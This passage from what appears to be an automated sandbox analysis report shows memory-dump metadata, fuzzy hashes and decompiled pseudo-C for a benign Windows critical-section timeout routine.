                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: ad45a019b63f788a1dd800a8ce50da6a4b517c0214d7219a06222c0cb69c98e1
                                                • Instruction ID: 303d7c5e005c6a5c33ed0897cdb7a41cc59ca0c4475d2ab6b9587f3b13fd68c1
                                                • Opcode Fuzzy Hash: ad45a019b63f788a1dd800a8ce50da6a4b517c0214d7219a06222c0cb69c98e1
                                                • Instruction Fuzzy Hash: 91B09BB19014D5C9F711D7604708717794077D0746F17C561D2024751A4778D1D5F5F5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                C-Code - Quality: 53%
                                                			E0487FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                				void* _t7;
                                                				intOrPtr _t9;
                                                				intOrPtr _t10;
                                                				intOrPtr* _t12;
                                                				intOrPtr* _t13;
                                                				intOrPtr _t14;
                                                				intOrPtr* _t15;
                                                
                                                				_t13 = __edx;
                                                				_push(_a4);
                                                				_t14 =  *[fs:0x18];
                                                				_t15 = _t12;
                                                				_t7 = E0482CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                				_push(_t13);
                                                				E04875720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                				_t9 =  *_t15;
                                                				if(_t9 == 0xffffffff) {
                                                					_t10 = 0;
                                                				} else {
                                                					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                				}
                                                				_push(_t10);
                                                				_push(_t15);
                                                				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                				return E04875720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                			}











                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0487FDFA
                                                Strings
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0487FE2B
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0487FE01
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                • API String ID: 885266447-3903918235
                                                • Opcode ID: 513bc6790fd2a456a27d297130f703b517e0a733b880875d11496f1a2e46f721
                                                • Instruction ID: c31929e441927226b616561706f955226260dbcb84d2303df2453f76bbf75cfd
                                                • Opcode Fuzzy Hash: 513bc6790fd2a456a27d297130f703b517e0a733b880875d11496f1a2e46f721
                                                • Instruction Fuzzy Hash: 42F0F676600601BFE7201A59DC02F33BBAAEB44770F140714F7289A5E1EAA2F86096F5
                                                Uniqueness

                                                Uniqueness Score: -1.00%